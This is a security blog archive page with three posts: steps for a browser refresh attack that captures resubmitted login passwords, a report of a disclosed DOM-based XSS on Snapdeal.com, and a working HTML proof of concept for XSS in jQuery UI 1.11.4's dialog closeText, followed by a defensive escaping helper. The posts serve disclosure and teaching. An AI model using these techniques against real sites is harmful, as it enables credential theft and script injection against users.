Posts

Showing posts from May, 2016

Browser refresh attack

A browser refresh attack enables an adversary to obtain application credentials by going back to the previous page and re-submitting the expired document.

How to perform:

1. Log in at https://<some-site>/login
2. Once logged in, try changing the password and log out.
3. Press "Back" in the browser window. You'll now see the "Document Expired" page.
4. Run an interceptor (Burp / Tamper Data).
5. Click "Try again" on the web page.
6. Click "Re-send data".
7. Watch the intercepted request. You'll observe that the login passwords being resubmitted by the browser get captured.

Snapdeal.com - Cross Site Scripting #Bug (DOM Based)

It was shocking to get an XSS vulnerability in Snapdeal.com. Recently, I was using Snapdeal to purchase some goods, but when I tried my luck for XSS, it was hardly a matter of seconds. Basically, it was DOM-based XSS. The requested payload was not going to the server. Instead, it was being included in the DOM itself and executed in the browser.

Proof of Concept: I used this URL with the bcrumbSearch parameter, which was used for searching the product name from the DOM. As you try to use this URL, the script gets executed in the browser, and I got a million dollar smile.

Aftermath: As a responsible security researcher, I reported this issue to help@snapdeal.com and support@snapdeal.com. I didn't get any reply from their side yet, but meanwhile the issue got patched without any intimation.

JQuery UI 1.11.4 Cross Site Scripting

Vulnerability name: XSS Reflected JQuery UI 1.11.4

I think nearly everyone gets shocked when Acunetix shows Cross Site Scripting in jQuery UI. But maybe many of you don't know how to exploit it. So, here is code which will explain how to exploit vulnerabilities like these. Place the script in the dialog function as shown in the code below.

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
    <title>XSS in closeText option of component ui dialog</title>
    <script src="https://code.jquery.com/jquery-2.1.4.js"></script>
    <script src="https://code.jquery.com/ui/1.11.4/jquery-ui.js"></script>
    <script>
        $(document).ready(function () {
            // closeText is inserted into the close button as HTML, so the script runs
            $('#dialog').dialog({ closeText: ' <script>alert("XSS")<\/script> ' });
        });
    </script>
</head>
<body>
    <!-- element targeted by the #dialog selector above -->
    <div id="dialog"></div>
</body>
</html>
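
The defensive counterpart to the PoC above, as an added example that is not part of the original post: escape untrusted text before it reaches closeText on jQuery UI releases before 1.12.0, the release from which closeText is no longer inserted as HTML. The helper names (escapeHtml, closeTextIsHtmlSink, hardenDialogOptions) are illustrative, not jQuery UI APIs.

```javascript
// Added example, not from the original post. Helper names are hypothetical.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Turn markup-significant characters into entities so the value renders as text.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// True when this jQuery UI version inserts closeText as HTML (releases before 1.12.0).
function closeTextIsHtmlSink(uiVersion) {
  const [major, minor] = String(uiVersion).split('.').map((n) => parseInt(n, 10));
  if (Number.isNaN(major) || Number.isNaN(minor)) return true; // unknown version: fail closed
  return major < 1 || (major === 1 && minor < 12);
}

// Returns a copy of the dialog options that is safe to pass to .dialog().
// On 1.12.0 and later the value is left alone, because escaping it there
// would show literal entities such as "&lt;" in the close button.
function hardenDialogOptions(options, uiVersion) {
  const safe = Object.assign({}, options);
  if (typeof safe.closeText === 'string' && closeTextIsHtmlSink(uiVersion)) {
    safe.closeText = escapeHtml(safe.closeText);
  }
  return safe;
}

// Browser usage (assumes jQuery UI is loaded, which exposes its version as $.ui.version):
//   $('#dialog').dialog(hardenDialogOptions({ closeText: untrusted }, $.ui.version));
```

Upgrading jQuery UI removes the sink itself; the wrapper is for pages that must stay on 1.11.x for now.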